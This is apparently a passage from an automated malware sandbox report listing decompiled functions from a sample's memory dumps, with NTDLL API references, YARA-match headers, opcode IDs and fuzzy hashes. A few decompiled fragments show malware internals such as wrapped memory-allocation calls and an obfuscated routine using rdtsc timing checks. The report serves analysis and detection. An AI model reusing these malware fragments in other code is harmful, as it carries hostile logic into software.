				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a11f
0x0041a127
0x0041a149
0x0041a14d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A05D, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A05D(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_push(0x8b5575d9);
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a063
0x0041a066
0x0041a069
0x0041a06f
0x0041a077
0x0041a085
0x0041a089

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d5fca921fd85cf4b9d755126263014063e917460283cf3c7d81fb5d3f0c609d0
Instruction ID: abf369e8c9b72943fd40ccc564da35c70b96e6cc65db1dd5d2d3dd86833378dd
Opcode Fuzzy Hash: d5fca921fd85cf4b9d755126263014063e917460283cf3c7d81fb5d3f0c609d0
Instruction Fuzzy Hash: 9DD0C2366001106BD710EBD4CC44FD73B59EF44360F154199BA1DAB241C530EA0086D0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a063
0x0041a066
0x0041a06f
0x0041a077
0x0041a085
0x0041a089

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 009100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009100CF

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00910048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00910053

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00910078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00910086

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 0090F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090F9FB

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0090F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090F90E

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0090FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FADB

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0090FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FAF3

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0090FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FBC3

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FB73

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0090FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FC9B

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0090FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FC6B

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FD9A

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0090FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FDCB

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0090FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FEAB

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0090FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FEDB

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090FFBF

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B9E0( &_v284, 0x104);
						E0041C050( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a9b
0x00409aa3
0x00409aa5
0x00409aaa
0x00409aaf
0x00409ac2
0x00409ac7
0x00409ad0
0x00409adc
0x00409aef
0x00409af4
0x00409af7
0x00409b00
0x00409b12
0x00409b17
0x00409b1c
0x00000000
0x00000000
0x00409b1e
0x00409b22
0x00000000
0x00000000
0x00409b24
0x00000000
0x00409b22
0x00409b26
0x00409b29
0x00409b2f
0x00409b31
0x00409b3c
0x00409b41
0x00409b44
0x00409b51
0x00409b5c
0x00409b5e
0x00409b64
0x00409b68
0x00409b6b
0x00409b6b
0x00409b72
0x00409b75
0x00409b7a
0x00409b87
0x00409ab6
0x00409ab6
0x00409ab6

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5

